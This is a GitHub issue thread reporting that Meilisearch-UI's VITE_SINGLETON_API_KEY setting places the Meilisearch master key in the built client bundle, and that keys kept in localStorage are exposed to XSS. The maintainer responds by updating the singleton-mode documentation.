Security .env issue when set VITE_SINGLETON_API_KEY & apiKey saved to local storage

[reinaldomendes]

VITE_xxxx variables are exposed on the frontend

Configure import.meta.env.VITE_SINGLETON_API_KEY will expose meilisearch master key to the world.

From Vite Docs

https://vite.dev/guide/env-and-mode.html#env-files

Important

SECURITY NOTES

.env.*.local files are local-only and can contain sensitive variables. You should add *.local to your .gitignore to avoid them being checked into git.

Since any variables exposed to your Vite source code will end up in your client bundle, VITE_* variables should not contain any sensitive information.

More about the security issue.

vitejs/vite#14412

To Reproduce

1. Configure Meilisearch-ui in Singleton mode
2. Open meilisearch-ui on google chrome
3. Open developer console in tab Source
4. Search for Assets containing apiKey
5. Add breakpoints when you find apiKey

Screenshots

Environments (please complete the following information):

• Not Applicable. All environments are exposed the same way.

[riccox]

@reinaldomendes

The application itself is a SPA, so whether the API KEY is passed this way or not will expose the API KEY on the front end.

And the API KEY can be found in local storage of your browser as well if you are not in SINGLETON mode.

Maybe this should be write into docs to make it clear?

[reinaldomendes]

@riccox

"The application itself is a SPA, so whether the API KEY is passed this way or not will expose the API KEY on the front end."

• There is a difference between SINGLETON mode. If I download the source code and recompile with those env vars, they will be world exposed to anyone in the file "assets/zustand-xxxx.js".
• Without pass VITE_SINGLETON_API_KEY in the environment variables the API Key will only exposed to the client browser (localstorage or debugging source code).

I just have download from github and then added the VITE_SINGLETON_API_KEY to .env file.

The I ran pnpm build.

The API KEY became exposed in dist/assets/zustand-B4CGb1Vr.js

[reinaldomendes]

@riccox

@reinaldomendes

The application itself is a SPA, so whether the API KEY is passed this way or not will expose the API KEY on the front end.

And the API KEY can be found in local storage of your browser as well if you are not in SINGLETON mode.

Maybe this should be write into docs to make it clear?

I think the docs should inform about exposing master key, it can cause leaks of master key.

The docker image is not exposing the API KEY, but if download the source and build, passing VITE_ env variables, the key will be found into assets js files(This is a major security issue).

Sensitive information must not defined in VITE_ variables.

The API KEY found in local storage may leak by XSS attack (I understand it is a SPA, but this risk should be noted)

• I don't know if there's such type of vulnerability into your meilisearch-ui, but poisoned data from meiliseach index may read localStorage and send the master key to external website.

[riccox]

@reinaldomendes

SINGLETON mode is designed to be used in local or internal network actually.

The risk of leaks of master key should be mentioned in documents.

Could you post a PR for this, or I will add this into README file later.

[riccox]

Singleton mode usage docs have been updated.